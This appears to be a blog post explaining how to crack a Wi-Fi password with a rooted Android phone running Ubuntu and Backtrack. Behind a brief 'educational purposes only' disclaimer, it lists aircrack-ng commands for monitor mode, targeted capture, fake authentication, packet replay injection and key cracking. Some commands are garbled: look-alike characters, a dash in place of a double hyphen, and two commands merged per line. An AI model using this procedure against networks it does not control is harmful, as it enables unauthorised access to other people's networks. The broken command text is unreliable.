Before I start, the topics discussed in this post is for educational purposes only. Please don’t misuse this information as it might be illegal in your country. Also this post is not newbie friendly, you will have to search and find some tools and procedures to install them.
For this post I will be using the Samsung Galaxy S2 which is a very popular android phone. You can obtain similar results with other phone. Please search the respective phone forums in xda developers to get Ubuntu running on your phone.
To crack the wifi password we need backtrack which runs on Ubuntu. So our first priority is to get Ubuntu running. There is a good post on how to run Ubuntu on Samsung Galaxy S2 at xda, other phone users search for it. With the terminal emulator running enter the commands as shown in the guide. Press the home button, start VNC viewer and connect with the settings.
Once we have Ubuntu running, download and install Backtrack. There are many guides on the internet on how to accomplish this
Commands to use in order
- airmon-ng ѕtаrt wlan0
- airodump-ng mon0
- airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0 aireplay-ng -1 0 -a (bssid) mon0
- aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0 aircrack-ng (filename)*.cap
